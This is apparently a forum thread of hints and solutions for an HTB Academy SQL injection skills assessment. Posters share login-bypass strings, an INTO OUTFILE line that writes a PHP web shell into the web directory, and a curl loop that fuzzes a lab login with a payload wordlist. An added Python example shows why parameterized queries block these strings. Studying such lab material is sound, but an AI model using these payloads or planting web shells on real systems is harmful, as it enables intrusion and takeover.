Skills Assessment - SQL Injection Fundamentals = Solved

@blueprismo said:

@basti394 said:
@blueprismo said:

@basti394 I’m also like you, also crawled and found 2 dirs, tried the payload all the things scripts, no luck…

I got it. My hint: You just have to fill a payload into the username
I’ve also filled all the payloads in the repo in the username…

Did you also use comments in the username?

DONE!! YAY

My problem is that I can’t reach the webshell via url

it’s kinda easy, just think a bit more, a web crawler may help you find the obvious… if u need more help PM me

I’ve bypassed the login page, and then got stuck on writing a web shell to the base web directory because of Errcode 13: “Permission denied”, then tried to write my web shell to the dashboard directory and Errcode 13 appeared again. I need a little nudge to find the appropriate vector for my attack (probably it is a directory, which I don’t know how to enumerate). Or maybe a web shell already exists on the webapp :) Help plz

Just finished the CTF. Was so fun.
Thank you HTB Academy.

Hi! Don’t want to create another topic.

Could anyone give me a hint about module ‘Using comments’ in SQL Injection fundamentals?

I’ve been trying in many ways, however I am still not able to log in as the user with id 5 in the database.

‘+ 1 Login as the user with the id 5 to get the flag’

Because the requirement is to log in as a different user, right? I am able to log in as ‘tom’ or ‘admin’, however their logins are known. How to log in as a specific user when we do not have a name?

Hi, can somebody help me? I uploaded the shell, but I can’t do anything with the shell, maybe the shell is wrong?? Hints, thanks

solved

Hey there!
I am also at the Tom question,

“Try to log in as the user ‘tom’. What is the flag value shown after you successfully log in?”

When I go to the website with Firefox and use a password payload such as ‘1’=‘1’ I get to the Admin Panel and it tells me I have successfully logged in.

but there is no flag

So when I use the terminal and try to connect with:
mysql -u tom -h Webside -P port -p
and enter the password which includes ‘1’=‘1’, the terminal does nothing and then sends me this error message:

ERROR 2013 (HY000): Lost connection to MySQL server at ‘handshake: reading initial communication packet’, system error: 11

Well … I don’t really know what to do now

@PortaHelle said:

Hey there!
I am also at the Tom question,

“Try to log in as the user ‘tom’. What is the flag value shown after you successfully log in?”

When I go to the website with Firefox and use a password payload such as ‘1’=‘1’ I get to the Admin Panel and it tells me I have successfully logged in.

but there is no flag

So when I use the terminal and try to connect with:
mysql -u tom -h Webside -P port -p
and enter the password which includes ‘1’=‘1’, the terminal does nothing and then sends me this error message:

ERROR 2013 (HY000): Lost connection to MySQL server at ‘handshake: reading initial communication packet’, system error: 11

Well … I don’t really know what to do now

Facing the same problem. Please help when you find a solution

Username: tom' or '1'='1 :grinning:

Username: tom' or '1'='1

This exercise is confusing. If you use the OR injection the website responds with “login successfull”. Use the comment injection and the website responds with the flag

How can I log in? Give me a nudge

Follow the module: try to bypass the AND id>1 with admin')--. If you log in as admin then follow the hint: try to test OR with condition id=1 and username as user. If you log in as admin, try id=5 with user as username

leave the password empty
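
Added example, not part of any post in this thread and not the lab's code: why the two username strings quoted above get past a login query built by string concatenation, and why the same strings fail against a parameterized query. The query shapes, table layout and sample rows are assumptions constructed for illustration, and SQLite stands in for the MariaDB backend.

```python
import sqlite3

# Query shapes are assumptions modelled on the thread's hints, not the lab's source.
PLAIN = "SELECT username FROM logins WHERE username='{u}' AND password='{p}'"
GROUPED = ("SELECT username FROM logins "
           "WHERE (username='{u}' AND id > 1) AND password='{p}'")

def make_db():
    """In-memory SQLite stand-in for the MariaDB backend, with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE logins (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO logins VALUES (?, ?, ?)",
                   [(1, "admin", "hash-a"), (2, "tom", "hash-t")])
    return db

def login_concatenated(db, template, username, password):
    """Vulnerable: input is spliced into the SQL text, so quotes and
    comment markers in it are parsed as SQL syntax."""
    sql = template.format(u=username, p=password)
    try:
        return [row[0] for row in db.execute(sql)]
    except sqlite3.Error:
        return []  # the spliced input produced invalid SQL

def login_parameterized(db, username, password):
    """Hardened: placeholders keep input as data; the statement text is fixed."""
    sql = ("SELECT username FROM logins "
           "WHERE (username = ? AND id > 1) AND password = ?")
    return [row[0] for row in db.execute(sql, (username, password))]

def demo():
    db = make_db()
    or_input = "tom' or '1'='1"   # username string quoted in the thread
    comment_input = "admin')--"   # username string quoted in the thread
    return {
        # AND binds tighter than OR, so the password test no longer guards 'tom'.
        "plain_or": login_concatenated(db, PLAIN, or_input, ""),
        # Everything after -- is a comment: id > 1 and the password test vanish.
        "grouped_comment": login_concatenated(db, GROUPED, comment_input, ""),
        # The same strings are compared literally and match no username.
        "param_or": login_parameterized(db, or_input, ""),
        "param_comment": login_parameterized(db, comment_input, ""),
        # A legitimate login still works.
        "param_valid": login_parameterized(db, "tom", "hash-t"),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:16} -> {rows}")
```

With prepared statements the username field stops being a place where SQL syntax can be introduced, which is the property the login form in this exercise lacks.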

Once you’ve bypassed the login form, pay attention to the number of columns and the present working directory when attempting to get remote code execution. For the login bypass, hacktricks.com should help. And one last hint… you are all alone. lol

Solved! HINT: upload a shell in the correct DIRECTORY

into outfile '/var/www/html/dashboard/shell.php'

  • Scan the website to find some file /db.sql
  • You will discover: the password is hashed, and you will have the database structure. Trying the password inside will give you nothing on the login page.
  • Given the above, you will know the only available field for you to hack is username. Try authentication bypass here, it works.
  • Then you’ve logged in. Now try the only input field on the web page. You should now find the column you could control, and then identify the vuln. You could either trigger an error or something else. The error message will show you that this server is MariaDB (MySQL) with PHP, and the response header tells you it’s LAMP on Ubuntu.
  • Now identify the column you could control and do what you’ve learned previously.

That’s all. Hope you enjoy.

There are multiple payloads to bypass the first step; with a simple bash script you can get it. I use these payloads: SQL Injection - Payloads All The Things

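#!/bin/bash
# Send each line of the wordlist as the username and report any response
# that does not contain the "Incorrect" login-failure message.
wordlist=payloads
url="http://94.237.49.11:52572"

while IFS= read -r payload; do
    # printf prints the payload literally (echo -e would interpret backslashes)
    printf '\rTrying: %s' "$payload"
    tput el   # clear what is left on the line from a longer previous payload
    # --data-urlencode keeps characters such as &, + and % intact in the POST body
    curl -s -i "$url" --data-urlencode "username=$payload" -d "password=test" | grep -q "Incorrect" || { echo -e "\n [*] Correct payload is: $payload\n"; }

done < "$wordlist"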